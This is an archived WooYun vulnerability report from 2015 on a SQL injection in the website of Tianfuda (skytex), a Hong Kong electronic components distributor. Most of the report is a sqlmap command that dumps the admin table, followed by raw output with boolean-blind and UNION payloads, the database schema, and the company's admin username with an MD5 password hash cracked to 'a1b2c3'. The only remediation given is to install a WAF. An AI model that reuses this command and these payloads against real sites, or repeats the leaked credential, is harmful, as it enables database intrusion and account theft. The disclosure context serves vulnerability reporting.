乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-08: 细节已通知厂商并且等待厂商处理中 2015-11-10: 厂商已经确认,细节仅向厂商公开 2015-11-20: 细节向核心白帽子及相关领域专家公开 2015-11-30: 细节向普通白帽子公开 2015-12-10: 细节向实习白帽子公开 2015-12-25: 细节向公众公开
自1993年成立至今, "天富达"已成为中国及香港地区被动元器件之主要供应商。 至今, "天富达"拥有来自日本Rubycon、美国Littelfuse、日本TDK等世界知名元器件生产商之区域代理或分销权, 可为各类型电子成品制造商提供"一站式采购"之服务。"天富达"以香港为总部, 在中国主要城市 : 深圳、上海、北京、成都、厦门、西安均设有办事处,服务网络覆盖中国主要工业区, 客户提供全面的产品技术支持及完善快捷物流服务。"天富达"之宗旨及目标是为客户提供"全方位服务", 熱诚的锁售代表、市场营销、技术工程师及客户服务都会尽量满足客户多方面之需要 : 提供新产品选择及应用、元器件技术测试并评估、订单履行及售後服务等。透过目标市场发展策略,我们会严谨跟进各市场之新产品动向和趋势,确保以最佳专业知识及最佳資源使我们的顾客及供应商与"天富达"得到共同成功。
地址:http://**.**.**.**/support.php?id=102
python sqlmap.py -u "http://**.**.**.**/support.php?id=102" -p id --technique=BU --random-agent --batch -D skytex -T web_admin -C id,admin_user,admin_pwd --dump
---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=102 AND 1434=1434 Type: UNION query Title: MySQL UNION query (20) - 23 columns Payload: id=102 UNION ALL SELECT CONCAT(0x7178707871,0x506b51584958744e48564364526a58734362535979744e50716b576e516e52654277554a56457870,0x7178716b71),10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10#---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'skytex_f@localhost'current user is DBA: Falsedatabase management system users [1]:[*] 'skytex_f'@'localhost'sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=102 AND 1434=1434 Type: UNION query Title: MySQL UNION query (20) - 23 columns Payload: id=102 UNION ALL SELECT CONCAT(0x7178707871,0x506b51584958744e48564364526a58734362535979744e50716b576e516e52654277554a56457870,0x7178716b71),10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10#---web application technology: Apacheback-end DBMS: MySQL 5Database: skytex+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| atype_info | 80 || atype | 23 || web_admin | 1 |+---------------------------------------+---------+Database: information_schema+---------------------------------------+---------+| Table | Entries |+---------------------------------------+---------+| COLUMNS | 365 || GLOBAL_STATUS | 291 || SESSION_STATUS | 291 || GLOBAL_VARIABLES | 277 || SESSION_VARIABLES | 277 || COLLATION_CHARACTER_SET_APPLICABILITY | 130 || COLLATIONS | 129 || CHARACTER_SETS | 36 || PARTITIONS | 32 || TABLES | 32 || SCHEMA_PRIVILEGES | 18 || PLUGINS | 10 || ENGINES | 8 || KEY_COLUMN_USAGE | 4 || STATISTICS | 4 || TABLE_CONSTRAINTS | 4 || SCHEMATA | 2 || PROCESSLIST | 1 || USER_PRIVILEGES | 1 |+---------------------------------------+---------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=102 AND 1434=1434 Type: UNION query Title: MySQL UNION query (20) - 23 columns Payload: id=102 UNION ALL SELECT CONCAT(0x7178707871,0x506b51584958744e48564364526a58734362535979744e50716b576e516e52654277554a56457870,0x7178716b71),10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10#---web application technology: Apacheback-end DBMS: MySQL 5Database: skytexTable: web_admin[3 columns]+------------+--------------+| Column | Type |+------------+--------------+| admin_pwd | varchar(100) || admin_user | varchar(100) || id | int(11) |+------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: id (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: id=102 AND 1434=1434 Type: UNION query Title: MySQL UNION query (20) - 23 columns Payload: id=102 UNION ALL SELECT CONCAT(0x7178707871,0x506b51584958744e48564364526a58734362535979744e50716b576e516e52654277554a56457870,0x7178716b71),10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10,10#---web application technology: Apacheback-end DBMS: MySQL 5Database: skytexTable: web_admin[1 entry]+----+------------+-------------------------------------------+| id | admin_user | admin_pwd |+----+------------+-------------------------------------------+| 1 | admin | 3c086f596b4aee58e1d71b3626fefc87 (a1b2c3) |+----+------------+-------------------------------------------+
上WAF。
危害等级:高
漏洞Rank:12
确认时间:2015-11-10 16:07
已將事件通知有關機構
暂无